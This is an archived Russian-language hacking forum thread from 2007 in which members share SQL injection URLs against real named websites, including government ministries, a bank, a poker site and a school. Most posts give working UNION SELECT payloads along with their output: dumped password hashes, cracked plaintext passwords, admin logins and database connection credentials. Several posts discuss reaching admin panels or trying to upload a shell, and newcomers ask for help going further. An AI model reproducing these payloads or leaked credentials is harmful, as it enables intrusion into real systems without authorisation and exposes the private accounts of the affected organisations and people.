ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.11.2007, 14:59
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
Румыния ... как ни странно!
ms.ro - какое-то медицинское Министерство Румынии
Код:
http://www.ms.ro/afis/pag.asp?idd=94&doi=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10/*
5.0.27-community-max-nt:a_ms:ODBC@localhost
59 таблиц:
Код:
decl_av
lst
lst_sc
men
men_bk
pghtml
viz2
viz2_old
vizms
bm
cat_caz
cat_indicator
cat_jud
cat_sectiune
date_jud
ape
ape_av
ape_comp
ape_comp_not
aviz
chimice
cosme
judete
nc_aprob
nc_aprob1
nc_aprob_r
not_cosm
not_cosm1
not_cosm_dbl
not_cosm_r
not_lab
not_lab_notif
not_lab_prod
notif
produs
scheme
sup_al
tari
discut
pro_disc
abilitari_notificari
abilitari_notificari_upload
activ_demnitari
По названиям таблиц - мало что понятно,
по названию полей в таблицах - ещё меньше... Вобщем заипался юзеров искать!
Кое-какие сведения юзеров встретил в табе notif
acta-cytol.com - журнал клинической цитологии и цитопатологии Румынии
Код:
http://www.acta-cytol.com/toc/auto_abstract.php?id=-1+-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
4.0.13-nt:acta:acta_db@localhost
|
|
|
23.11.2007, 15:00
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
нашел в кладовке sql-inj на 604poker.com =)
Код:
http://www.604poker.com/display.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,version(),0x3a,database()),12,13,14,15/*
604poker@localhost:5.0.24:604poker_com
Код:
http://www.604poker.com/display.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(Host,0x3a,User,0x3a,Password),12,13,14,15+from+mysql.user+limit+0,1/*
localhost:root:392d71987544b253
mikethicke.com:root:392d71987544b253
66.84.13.133:root:392d71987544b253
%:root:392d71987544b253
localhost.localdomain:root:392d71987544b253
%:wikiuser:6509500e0c6c52c4 //пароль:d65k321
localhost.localdomain:wikiuser:6509500e0c6c52c4
%:604poker:392d71987544b253
localhost:604poker:392d71987544b253
:mike:5206044616733ec8
localhost:mike:5206044616733ec8
sga:5b24704e417d3f71 //пароль:terra2
localhost:sga:5b24704e417d3f71
localhost:h4w55262:392d71987544b253 //это впоследствии окажется логин к фтп =))
Код:
http://www.604poker.com/display.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(name,0x3a,pass),12,13,14,15+from+604poker_com.dbusers+limit+0,1/*
admin:$1$Tmj.kF27$yqyJjREgZQ6/pydTRwET00
Код:
http:// www.604poker.com/ admin
admin:76trew21
Код:
http://www.604poker.com/display.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,user_password,0x3a,user_email,0x3a,user_icq),12,13,14,15+from+phpbb2_users+limit+1,1/*
admin:36194e87e76797813435263e4cb2666e:linden16 |
|
|
|
23.11.2007, 15:14
|
|
Новичок
Регистрация: 21.11.2007
Сообщений: 15
Провел на форуме:
65178
Репутация:
21
|
|
Сообщение от Red_Red1
Белвнешэкономбанк
Код:
http://bveb.by/currency/pmetals.php?Metal=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5,6/*&DateStamp=2007-11-20%2000:00:00
А вот для входа юзеров там савсем другой сайтик.... интересно и там порыться но это уже другая история 
http://bveb.by/currency/pmetals.php?Metal=-2+union+select+1,LOAD_FILE(char(47)),3,4,5,6%20fro m%20mysql.user/*&DateStamp=2007-11-20%2000:00:00
$DBhost="localhost";
$DBuser="vbank";
$DBpassword="Dilnak41";
$DBdatabase="bvebank";
$CommonResurseLocation = "http://217.23.115.9/";
коннект к мускулу возможен с любого хоста
user: vbank
host: %
таблицы.
bvebank (48)
balanc1
balance
balanceitem
bankfinnews
bankomat
bankomat_city
bankomat_users
banktitles
br1
br2
bv
cp
d_currency
d_filials
d_name
d_percent
d_stavki
d_users
filials_time_work
mainfinacts
mainfinactsarch
metalr1
metalr3
metalr4
metalr5
metalr6
metalr7
metalt1
metalt3
metalt4
metalt5
metalt6
metalt7
mt1
mt2
opros
opros1
opros2
partner
pmetals
property
propertyitem
revenue
revenueitem
sadmusers
subscribertasks
subscribeusers
users
|
|
|
|
23.11.2007, 15:29
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Ахалай махалай рахат лукум sql-inj на vfs.com =)
собсно найдена она была давно... и на ней уже успел "поработать" какой-то сеошник =(
красивый вывод всех таблиц...
Код:
http://www.vfs.com/faculty.php?id=-1+union+select+1,concat(table_name),3+from+information_schema.tables/*
Код:
http://www.vfs.com/faculty.php?id=-1+union+select+1,concat(auth_username,0x3a,auth_password),3+from+vfscom_db.auth_tbl/*
stephen:261972f4500fa75a //пароль:eezy4u:
ccalnan:28f639a5162ecbb9
jderry:17fc2e8f0148bb35 //пароль:beb78e:
beata:0b097aa7659f8502
bbains:261972f4500fa75a //пароль:eezy4u:
studentservices:41acaf8f60411fc0
jennica:314f01b446e888ba
olambert:5a4e3a8648b173d6
mediateam:261972f4500fa75a //пароль:eezy4u:
lhenderson:261972f4500fa75a //пароль:eezy4u:
jbringsli:264f74d364088dd0
jmorris:61f5620c5a2c7c05
wtsang:659bab5b180b310c
Код:
http://www.vfs.com/robots.txt
User-agent: *
Disallow: /webtv/
Disallow: /webtv.php
Disallow: /index_down.html
Disallow: /htmlemail/
Disallow: /webs/
Disallow: /backend/ //админка
также там есть вордресс... |
|
|
|
23.11.2007, 15:33
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215
Репутация:
86
|
|
http://www.dropball.ru/casino-bet.php?t=e07&userid=-1+union+select+1,2,3,4,5,6,7,8/*
Что делать дальше? Отпишитесь пожалуйста.
dropball@localhost
Последний раз редактировалось Mike 007; 23.11.2007 в 15:36..
|
|
|
|
23.11.2007, 19:03
|
|
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459
Репутация:
79
|
|
Сообщение от Mike 007
http://www.dropball.ru/casino-bet.php?t=e07&userid=-1+union+select+1,2,3,4,5,6,7,8/*
Что делать дальше? Отпишитесь пожалуйста.
dropball@localhost
БД версия 4
Нашёл только w3t_Boards w3t_Posts
Хотя вру там учитывай регистр тебе не покажет w3t_user а w3t_User будет верно
т.е.
Код HTML:
http://www.dropball.ru/casino-bet.php?t=e07&userid=-1+UNION+SELECT+1,2,3,4,5,6,7,8+FROM+w3t_Users/*
Полей пока не нашёл
|
|
|
|
23.11.2007, 20:21
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215
Репутация:
86
|
|
https://www.cbil.upenn.edu/svn/gus/GusAppFramework/tags/DistribJob_release_1-0/Model/schema/oracle/users.sql
а тут что можно сделать?
|
|
|
|
23.11.2007, 20:37
|
|
Новичок
Регистрация: 21.11.2007
Сообщений: 15
Провел на форуме:
65178
Репутация:
21
|
|
есть немного
Газетки почитать ..
http://www.trud.ru/issue/article.php?id=-200711212130102%20union%20select%201,2,3,name,5,pa ssword,7,8,9,10,11,12,13,14%20from%20forum.ibf_mem bers%20where%20id=1/*
в админке был..залить шел не удалось..чет там намудрил админ..
Тут погода ..типа 
http://news.gismeteo.ru/?newsitem=63331505902%20UNION%20select%201,2,3,4,5 ,6%20from%20news
..ничего не понял..т.е. че делать дальше не придумал
Банкир.ру ..
http://kurs.bankir.ru/index.php/abs/1/?v2=0&v1=170&fromd=23&fromm=10&fromy=2007&tod=-23'%20union%20select%201,2,3,version()/*&tom=11&toy=2007
Пятый мускул.. есть там чет типа админки, но только курсы валют подходят, до админки самого банкира (админ.банкир.ру) так и не добрался.. если есть в зале жуки майские, поднимите руку.
http://maryjane.ru - магазин футболок..
http://maryjane.ru/?action=reprintrequest&goodId=-16422'%20union%20select%201,2,3,4,5,version(),7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36/*
таблица юзерс..поле пассворд..да сами все пймете..
5.0.27 |
|
|
|
23.11.2007, 21:03
|
|
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459
Репутация:
79
|
|
Министерство природных ресурсов российской федерации
Код HTML:
http://www.mnr.gov.ru/part/?act=more&id=4409&pid=11+UNION+SELECT+concat(login,0x3a,password),2+From+users+limit+1,1/*
БД версии 4
SANTIAGO:GAHAN200
ADMIN_CONT:WAS4CRF
ADMIN_NEWS:ADMKOMP
ADMIN_VODA:HGC3MK9S |
|
|
|
23.11.2007, 21:42
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
ЕЕстония
www.kert.diip.ee
Код:
http://kert.diip.ee/index.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5+--+
4.1.22-standard-log:diip_kert@localhost:diip_kert
Код:
http://kert.diip.ee/index.php?id=-1+union+select+1,2,concat_ws(0x3a,user_name,password),4,5+from+user+limit+0,1+--+
past:f16b82ee4c79ac26a8c8882cb2e7c525
niko:f42a0453acb448913db7ac8340b5b4f7
anc:e8a28a7ba22e61ddd16612b6d0d6947f
joe:539e53ab51366fccd762c14cfb4a4665
------------------------------------
86 пользователей
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
